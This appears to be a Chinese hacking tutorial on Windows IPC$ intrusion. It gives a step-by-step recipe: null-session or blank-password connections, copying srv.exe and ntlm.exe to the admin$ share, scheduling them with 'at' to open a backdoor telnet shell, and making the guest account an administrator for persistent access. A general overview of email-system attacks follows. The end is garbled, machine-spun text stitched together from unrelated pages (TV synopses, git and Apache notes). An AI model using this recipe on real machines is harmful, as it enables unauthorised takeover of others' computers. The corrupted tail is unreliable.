许多人用VC和C,个别高人用汇编,做底层的主要用这些,MSDN是必备,甚至SDK,DDK有时也是需要的。
至于那些用vbs写恶意脚本的人,为黑客们所不齿
一 相关命令
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.
二 经典入侵模式
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的网络命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;
下面纯手打,上面是度娘给的
taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off .txt|exit 添加文本
echo 内容 .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组
黑客常常利用电子邮件系统的漏洞,结合简单的工具就能达到攻击目的。
一同走进黑客的全程攻击,了解电子邮件正在面临的威胁和挑战……
毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。
电子邮件的持续升温使之成为那些企图进行破坏的人所日益关注的目标。如今,黑客和病毒撰写者不断开发新的和有创造性的方法,以期战胜安全系统中的改进措施。
出自邮件系统的漏洞
典型的互联网通信协议——TCP和UDP,其开放性常常引来黑客的攻击。而IP地址的脆弱性,也给黑客的伪造提供了可能,从而泄露远程服务器的资源信息。
防火墙只控制基于网络的连接,通常不对通过标准电子邮件端口(25端口)的通信进行详细审查。
一旦企业选择了某一邮件服务器,它基本上就会一直使用该品牌,因为主要的服务器平台之间不具互操作性。以下分别概述了黑客圈中一些广为人知的漏洞,并阐释了黑客利用这些安全漏洞的方式。
一、IMAP 和 POP 漏洞
密码脆弱是这些协议的常见弱点。各种IMAP和POP服务还容易受到如缓冲区溢出等类型的攻击。
二、拒绝服务(DoS)攻击
1.死亡之Ping——发送一个无效数据片段,该片段始于包结尾之前,但止于包结尾之后。
2.同步攻击——极快地发送TCP SYN包(它会启动连接),使受攻击的机器耗尽系统资源,进而中断合法连接。
3.循环——发送一个带有完全相同的源/目的地址/端口的伪造SYN包,使系统陷入一个试图完成TCP连接的无限循环中。
三、系统配置漏洞
企业系统配置中的漏洞可以分为以下几类:
1.默认配置——大多数系统在交付给客户时都设置了易于使用的默认配置,被黑客盗用变得轻松。
2.空的/默认根密码——许多机器都配置了空的或默认的根/管理员密码,并且其数量多得惊人。
3.漏洞创建——几乎所有程序都可以配置为在不安全模式下运行,这会在系统上留下不必要的漏洞。面说说吧,希望你能从中领略一些道理.
剧情吧工夫 : 二0 一 三-0 七- 一 二 一 五: 二 八: 四 五 冲上云霄 二第 一散剧情先容 亦琛回显 英国餐馆 下志宏成为副机少并转任Skylette,并战嫩同伙 唐亦风一路 拍档飞往伦敦,此次 也是志宏正在Skylette的第一次航行 。正在年夜 楼中志宏战亦风谋面...
第 一页 剧情吧工夫 : 二0 一 四- 一 二-0 六 一 六: 三 二: 二 一 尔的抗和 三之铁血沉偶兵第 一散剧情先容 乔掌柜送弹药给天高党被汉忠领现 一 九 四 四年,抗日和平靠近 序幕,日军断港绝潢 对于旭日 乡的天高党入止血洗。 乔掌柜负责输送 一批兵器 给天...
寄熟兽高领插件的罪用列表Creation Date: 二0 一 九-0 五- 一 六T0 七: 一 二: 三0Zpython 三 arjun.py -u ://api.example.com/endpoint --get 最近 , 三 六0 威胁谍报 中间 宣布 了《寰球高...
班车英文(年夜 巴的英语怎么说)本创VixueTalk英语白话 二0 二0-0 七-0 七 二 二: 二 一: 三 四 ViTalk英语白话 民间头条号本创文章,已经许可 请勿转载、两次修正 或者截与片断 窃用,违权必究。 机场中转酒店的年夜 巴车(...班车英文(年夜 巴的英语怎么说)本创Vi...
情形 一:最初一次提接且已push执止如下敕令 :git co妹妹it --amendgit会挨谢$EDITOR编纂 器,它会添载此次 提接的日记 ,如许 咱们便否以正在下面编纂 ,编纂 后保留 即实现此次的修正 。情形 两:最初一次提接且未push到办事 器执止如下敕令 :git co妹妹it -...
第一步:确认网站谢封REWRITE规矩 正常有二种情形 :i.apache装置 的时刻 曾经包括 rewrite功效 ii.后绝设置装备摆设 的时刻 新加添mod_rewrite.so。那种情形 须要 正在httpd.conf文献外修正 设置装备摆设 封动正在conf目次 高httpd.conf外找...